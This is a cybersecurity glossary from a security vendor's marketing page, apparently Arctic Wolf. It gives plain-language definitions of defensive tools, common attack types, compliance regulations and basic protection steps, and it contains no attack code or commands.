The world of cybersecurity constantly changes, so ongoing education is the key to understanding today’s new threats. But how do you even begin? It all starts with a firm grasp of terminology. However, knowing all of the different terms can feel overwhelming. Don't worry! We're here to support you.
Here are a variety of important terms, attack types, regulations, commonly asked questions and even actionable steps to learn more about the basics of cybersecurity.
Cybersecurity 101: Definitions to Know
What Is Cybersecurity?
Is there a better place to start? ‘Cybersecurity’ is a set of techniques for protecting an organisation’s digital infrastructure – including networks, systems and applications – from being compromised by attackers and other threat actors. Cybersecurity combines technology, people and processes to create strategies aimed at protecting sensitive data, ensuring business continuity and safeguarding against financial losses.
What Are The Types of Cybersecurity Solutions?
Anti-virus is a type of IT security software that scans for, detects, blocks and eliminates malware. AV programs will typically run in the background, scanning for known malware signatures and behaviour patterns that may indicate the presence of malware.
Endpoint detection and response is a category of tools and solutions that focus on detecting, investigating and mitigating suspicious activity on endpoints and hosts. The value of EDR is in its ability to detect advanced threats that may not have a known behavioural pattern or malware signature. EDR can also trigger an adaptive response based on the nature of detected threats. Arctic Wolf’s security offerings complement EDR solutions to provide a higher level of overall security.
Managed detection and response is a component of SOC-as-a-service that offers comprehensive solutions for continuous monitoring, threat detection and incident response by a third-party supplier. It's a holistic, turnkey solution for real-time, advanced threat management that helps in-house IT teams to prioritise incidents and improve their organisation’s security posture.
A network operations centre is a central location from where network administrators manage and control one or more networks and a primary server across geographically distributed sites. NOC engineers deal with DDoS attacks, power outages, network failures and routing black holes. An NOC is not a security solution. A customer with an NOC – or NOC services – is not protected from advanced cyberthreats.
A security operations centre is the combination of cybersecurity personnel, threat detection and incident response processes and supporting security technologies that make up an organisation’s security operations. Larger enterprises typically build and manage a SOC in-house. Organisations of every size may choose to outsource their SOC to a SOC-as-a-service provider like Arctic Wolf.
SIEM stands for security information and event management. SIEM is an integrated tool that collects and aggregates security events and alerts from different security products. The SIEM software analyses and correlates those events to identify potential threats inside an organisation’s environment.
Vulnerability management solutions identify, track and prioritise internal and external cybersecurity vulnerabilities, optimising cyberattack prevention activities such as patching, upgrades and configuration fixes. Arctic Wolf Managed Risk is a market-leading continuous VM service.
Vulnerability assessment is the process of identifying, classifying and prioritising vulnerabilities in business systems. Assessments can focus on internal, external or host-based vulnerabilities.
What are the Different Types of Cyberattacks?
A brute-force attack is an attempt by a malicious actor to gain unauthorised access to secure systems by trying all possible passwords and guessing the correct one. Arctic Wolf MDR service tracks login attempts and failures and can detect brute-force attacks.
In this variant of phishing attacks, the attacker attempts to trick users into authorising a malicious app or integration. Once the malicious app is authorised, it can be used to compromise accounts, exfiltrate data or exploit further attack vectors.
Credential Stuffing attacks exploit existing databases of compromised username/password combinations. Attackers attempt to login to a target account using these previously-breached passwords.
Cross-site scripting (XSS) is an attack that injects malicious scripts into a legitimate and trusted website. XSS attacks exploit vulnerabilities in web applications. The malicious code executes when an unsuspecting end-user visits the website, then may access sensitive data and session information gathered by the browser. Attackers also use XSS to plant trojans, keyloggers and other malware.
A data breach refers to any event where unauthorised users steal sensitive information from a company. Often, this information is personally identifiable information (PII) or financial information for resale.
A distributed denial-of-service attack seeks to crash a web server or an online service by flooding it with more traffic than it can handle. The attack is executed in stages that include installing command-and-control (C2) software on victim devices and creating botnets that are programmed to target the online server or service.
DNS hijacking, also known as DNS redirection and DNS poisoning, redirects queries to a Domain Name System (DNS) – typically to a malicious website that contains malware, advertising or other unwanted content. DNS is the equivalent of a series of internet phone books, and DNS hijacking essentially forces the browser to go to the wrong location.
In a drive-by attack, the user doesn't have to download malware, click on a malicious link or take some other action. Instead, malicious code is downloaded automatically to the user's device, typically when the user visits a compromised website.
An exploit is a malicious application or script that takes advantage of a vulnerability in endpoints and other hardware, networks or applications. Attackers typically use exploits to take control of a system or device, to steal data or to escalate access privileges. Exploits are often used as a component of a multi-layered attack.
Golden Ticket Attack
A golden Ticket Attack occurs when an attacker has gained control over a Domain’s Key Distribution Service (KDS), which is designed to grant user requests to access network resources. Once an attacker has gained this control, they are able to produce unauthorised ‘Golden Tickets’ granting the attacker access to resources within the domain.
Malware is malicious software that spreads via an email attachment or a link to a malicious website. It infects the endpoints when a user opens the attachment or clicks on the link.
Ransomware is a type of malicious software (malware) that prevents the end user from accessing a system or data. The most common form is crypto ransomware, which makes data or files unreadable through encryption and requires a decryption key to restore access. Another form – locker ransomware – locks access rather than encrypting files. Attackers typically request a payment – often in the form of bitcoins – to decrypt files or restore access.
Supply Chain Attack
A supply chain attack occurs when a threat actor is able to attack a target by means of compromising a third-party resource. In many circumstances, the compromised supplier is not the final target but is instead used as the method to exploit or gain access to the intended victim. In some situations, a supply chain attack might include numerous additional victims who were not necessarily the final intended target.
A web shell is an attack technique in which a threat actor is able to upload a malicious web-based shell-like interface to a web server for the purposes of executing desired commands. Often, a web shell makes use of a vulnerability within the target and allows the threat actor to obtain a command line interface for command execution.
What Happens During a Ransomware Attack?
During a ransomware campaign, attackers often use phishing and social engineering to get a computer user to click on an attachment or a link to a malicious website. Some types of ransomware attacks, however, don’t require user action because they exploit website or computer vulnerabilities to deliver the payload. Once it infects your computer, you know you’re a victim, because the attack will launch an on-screen notification with the ransom demand.
Phishing is a malicious email that tricks users to surrender their user credentials. The email may appear legitimate – as if coming from your bank – and ask you to reset your password. In a spearphishing attack, an individually-crafted email targets a key executive or decision maker. Arctic Wolf MDR can detect and warn you of phishing and spearphishing.
Security misconfigurations result from the failure to properly implement security controls on devices, networks, cloud applications, firewalls and other systems, and can lead to data breaches, unauthorised access and other security incidents. Misconfigurations can include anything from default admin credentials, open ports and unpatched software, to unused web pages and unprotected files.
An SQL injection is a technique that inserts structured query language (SQL) code into a web application database. Web applications use SQL to communicate with their databases, and a SQL injection relies on a user to input information, such as login credentials. Attackers can use SQL injections to perform actions such as retrieval or manipulation of the database data, spoofing user identity and executing remote commands.
A Trojan horse is typically a legitimate-looking but malicious code or application that can be used for a variety of nefarious actions, including to steal, delete or modify data – and disrupt computers or a network. Trojans have different categories, such as exploits, backdoors and rootkits.
What Are Some of the Different Kinds of Cybersecurity Compliance Regulations?
The California Consumer Privacy Act applies to all businesses selling products and services to Californians, regardless of the business' physical location or presence in the state. CCPA enables consumers to request information on what data the business collects about them and for what purposes. Businesses that don't meet certain minimum thresholds are exempt.
The Cybersecurity Maturity Model Certification is a unifying standard for cybersecurity across Department of Defense contractors. It provides five levels of security and certification. Meeting and certifying the correct CMMC level is increasingly necessary to bid on DoD contracts and do business with the department.
The Defense Federal Acquisition Regulation Supplement (DFARS) to the Federal Acquisition Regulation (FAR). DFARS is administered by the Department of Defense (DoD), and applies to DoD contractors that process, store or transmit unclassified, non-public information.
The Federal Financial Institutions Examination Council is an intra-agency federal body that sets uniform standards for regulated financial institutions. It provides a Cybersecurity Assessment Tool to help institutions to identify their risk and track their cybersecurity preparedness.
The General Data Protection Regulation is a legal framework that sets guidelines for the collection and processing of individuals’ personal information within the European Union (EU). Organisations must comply regardless of their physical location or presence in the EU if they process or store the data of EU subjects.
Gramm-Leach Bliley Act
The Gramm-Leach Bliley Act (GLBA) requires financial institutions and other entities that provide financial products – including loans, insurance and investment advice – to safeguard sensitive data and to explain their information-sharing practices to customers.
The Health Insurance Portability and Accountability Act protects the privacy of patient health records. Title II, in particular, governs the secure storage, processing, transfer and access of electronic protected health information (ePHI). HIPAA imposes compliance requirements on healthcare providers and related companies. Arctic Wolf helps customers to meet HIPAA compliance goals.
The National Institute of Standards and Technology is a non-regulatory entity under the umbrella of the United States Department of Commerce. NIST Publication Series 800 provides a comprehensive listing of information security measures and controls based on extensive research. Arctic Wolf delivers prevention, detection and response functions as defined by NIST.
The Payment Card Industry Data Security Standard (PCI-DSS) was developed to protect credit, debit and cash card transactions and prevent the misuse of cardholders’ personal information by any companies/merchants that electronically handle cardholder data. PCI imposes compliance requirements on any company that processes customer payments. Arctic Wolf helps customers to meet PCI compliance goals.
Sarbanes-Oxley Act (SOX)
Sarbanes-Oxley Act (SOX) are expanded regulatory requirements governing all US public companies, foreign companies with securities registered with the Securities and Exchange Commission and public accounting firms. The primary goal of SOX is to prevent fraudulent financial reporting and to protect investors.
What Are Managed Security Services?
Managed security is a service or solution provided by an outside supplier – typically as a subscription model – to manage and oversee a specific security aspect. Organisations typically use managed security services to either completely outsource their security functions or to scale their needs to complement their in-house capabilities.
What Is an MSSP?
A managed security service provider (MSSP) is a supplier that manages and monitors an organisation’s security 24×7. MSSP services may include, among others, deployment of security infrastructure, monitoring endpoints and managing network security.
What is SOC-as-a-Service?
SOC-as-a-service is a subscription-based, outsourced alternative to an in-house security operations centre (SOC). A SOC-as-a-service supplier offers a comprehensive set of solutions, such as managed detection and response, and provide organisations with a dedicated team of experts who are available around the clock to detect, monitor and respond to incidents. SOC-as-a-service combines people, processes and technology to deliver cost-effective cybersecurity and help organisations to maintain compliance.
Additional Cybersecurity Terms to Know
API (Application programming interfaces) is a computing interface that defines and standardises interactions between two pieces of software. APIs are an invaluable source of data for security operations, especially when collecting information from security tools or cloud platforms.
An Advanced Persistent Threat – or ATP – is an advanced threat actor, which is commonly a nation state or state-sponsored in origin. In most cases, these groups are highly skilled and driven by political or economic motives. As compared to less sophisticated threat actors, an ATP will generally work in a slower, more methodical fashion, in an attempt to remain undetected while integrating themselves deeper into their target’s environment.
CASB (Cloud Access Security Broker) is software that sits between cloud services and cloud users, monitoring activity and enforcing security policies.
CSPM (or SSPM)
Cloud Security Posture Management (or Software as a service Security Posture Management) is the practice of continuously benchmarking and managing cloud or SaaS instances, identifying misconfigurations and other vulnerabilities and prioritising and remediating these cloud risks. It can be facilitated by CSPM tools or delivered as a service by CSPM solutions.
The Darkweb includes internet resources, such as websites and social networks that are not indexed or accessible through most search engines. Since much of the darkweb is hidden from the public, it hosts a large amount of criminal or illicit activity. In many cases, accessing the dark web requires the use of specific browsers and protocols, making it difficult to track and control.
Identity and Access Management is the practice of ensuring that only the correct individuals have access to an organisation's resources – at the right times, for the right reasons.
MFA/2FA (Multi-factor authentication/two-factor authentication) are security tools that require users to provide multiple pieces of evidence to a computer system before accessing services or an account, such as a password and a code sent to another device. MFA defends against attacks that exploit password vulnerabilities and is rapidly becoming a universal security standard in business technology.
What Are the Necessary Steps to Protect Against Cyber Threats?
You cannot protect what you don't know you have – the first step in protecting against threats is to identify the vulnerabilities in your environment. A risk assessment helps you to identify and manage vulnerabilities. Once you perform a vulnerability scan, you can prioritise mitigation steps based on the top risks. Since your environment continuously changes, therefore meaning your risks do too, identifying vulnerabilities should be a continuous, ongoing process.
To protect your IT infrastructure against threats, you need multi-layered defences across your perimeter, as well as anywhere your data resides or is accessed. This includes your cloud applications and workloads, BYOD devices and any place where users may access your network and sensitive resources.
Threats will slip through, as no protection is fool proof, no matter how many layers you have. Detection helps you to find the threats that got past your defences, whether that's never-before-seen malware or an attacker using stolen credentials. You should monitor your environment 24x7 and detection can't rely on technology alone. You need skilled security analysts who can make the type of decisions that require human intelligence.
The quicker you respond, the better your chances of limiting the ‘blast radius’ – the damage an attack can inflict on your organisation – and prevent data exfiltration. In addition to analysts to monitor alerts, your security team needs responders who can quickly make decisions to minimise an incident. Automating some of the response actions will also speed up the remediation cycle.
Recovery is the final step after an incident, and recovery preparedness includes more than simply ensuring data backup. After an attack, you need to quickly restore affected systems and operations, in addition to ensuring that the threat is eradicated. It's also highly recommended to include data recovery processes and procedures in your disaster recovery plan.
- Join the conversation with Arctic Wolf on Facebook, Twitter, LinkedIn and YouTube
- Visit arcticwolf.com to learn more about our security operations solutions
- If you’re ready to get started, request a demo or get a quote today